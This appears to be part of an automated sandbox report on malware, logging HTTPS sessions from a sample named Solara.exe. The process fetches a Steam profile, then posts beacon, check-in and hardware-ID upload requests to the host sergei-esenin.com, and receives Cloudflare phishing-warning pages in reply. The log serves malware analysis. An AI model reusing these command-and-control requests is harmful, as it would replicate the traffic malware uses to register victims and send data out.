2024-10-12 23:33:09 UTC	823	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5crn8jpse4ita738q65kboianh; expires=Wed, 05 Feb 2025 17:19:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4ctHZFXt6GvwdNsmdxmbB4OtQt8AP7bfVSdX26QLwnc9Bl4uaZ9HRM9KHrwIA%2BG9yJ0p4j7egxseXHghxUULCsVQ1U8gsTrWOLMnh7ufRem3SN1DUGQIXxyfGjJGh3akPu8Kg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4adc87f436a-EWR alt-svc: h3=":443"; ma=86400
2024-10-12 23:33:09 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-12 23:33:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	104.102.49.254	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:10 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-12 23:33:11 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 12 Oct 2024 23:33:10 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=2d3fa37933740902881225c8; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-12 23:33:11 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-12 23:33:11 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-12 23:33:11 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-12 23:33:11 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	104.21.53.8	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:11 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-12 23:33:11 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-12 23:33:12 UTC	557	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M5LuTAxexuN0%2FcGj97S9lCcsjgamplYx8veH0G9rl02E4TwA%2FsDWfr%2FmSDY%2FjseF5tPsosl0oelTgiiOarTE8o2cI%2FuqPx1DryXZiOICsYIYqLhwU88UG91Rq4zhOBiG6VtZUw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4bdffb50f3e-EWR
2024-10-12 23:33:12 UTC	812	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 23:33:12 UTC	1369	IN	Data Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
2024-10-12 23:33:12 UTC	1369	IN	Data Raw: 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: anagement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-12 23:33:12 UTC	891	IN	Data Raw: 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d Data Ascii: > <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id=
2024-10-12 23:33:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	104.21.53.8	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:12 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: sergei-esenin.com
2024-10-12 23:33:12 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 41 73 4e 4e 32 2d 2d 36 38 31 31 30 31 38 37 30 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=1AsNN2--6811018700&j=
2024-10-12 23:33:12 UTC	557	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pfN6wnapNxIXJ3sP%2Bsaw3a2yMSUPXi0D3VpuKv%2BiJaVN9di1YOXQ4iCXMVfoNl%2Fn5SG4uJpmFf%2F4AQREMwF4xBB0EiTRDTMXbqN3JtisVGZIfEkq3xlLao2ygzfVQsH7Xp%2BYyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4c29fee4373-EWR
2024-10-12 23:33:12 UTC	812	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 23:33:12 UTC	1369	IN	Data Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
2024-10-12 23:33:12 UTC	1369	IN	Data Raw: 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: anagement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
2024-10-12 23:33:12 UTC	891	IN	Data Raw: 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d Data Ascii: > <span class="cf-footer-separator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id=
2024-10-12 23:33:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	104.21.53.8	443	6812	C:\Users\user\Desktop\Solara.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-12 23:33:13 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1253 Host: sergei-esenin.com
2024-10-12 23:33:13 UTC	1253	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 32 30 44 42 32 42 44 42 32 45 45 39 41 31 44 41 32 43 44 41 37 38 35 35 33 45 41 43 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 41 73 4e 4e 32 2d 2d 36 38 31 31 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"B920DB2BDB2EE9A1DA2CDA78553EAC6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"1AsNN2--68110
2024-10-12 23:33:13 UTC	555	IN	HTTP/1.1 200 OK Date: Sat, 12 Oct 2024 23:33:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WJjcWfL4%2BilCV3cUIaXHcpggYHPAHvI3eHp7qjTmb9H7kL7%2FeY6zN4v2OwzRDPal6LeVHBPfuQVnOOhU43QjWdi0dr3QLUgzrRYgyRnfuuduaaU4sO%2BGqjBKu%2BqAF6aLZA61A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d1ae4c6ec6043dd-EWR
2024-10-12 23:33:13 UTC	814	IN	Data Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-10-12 23:33:13 UTC	1369	IN	Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
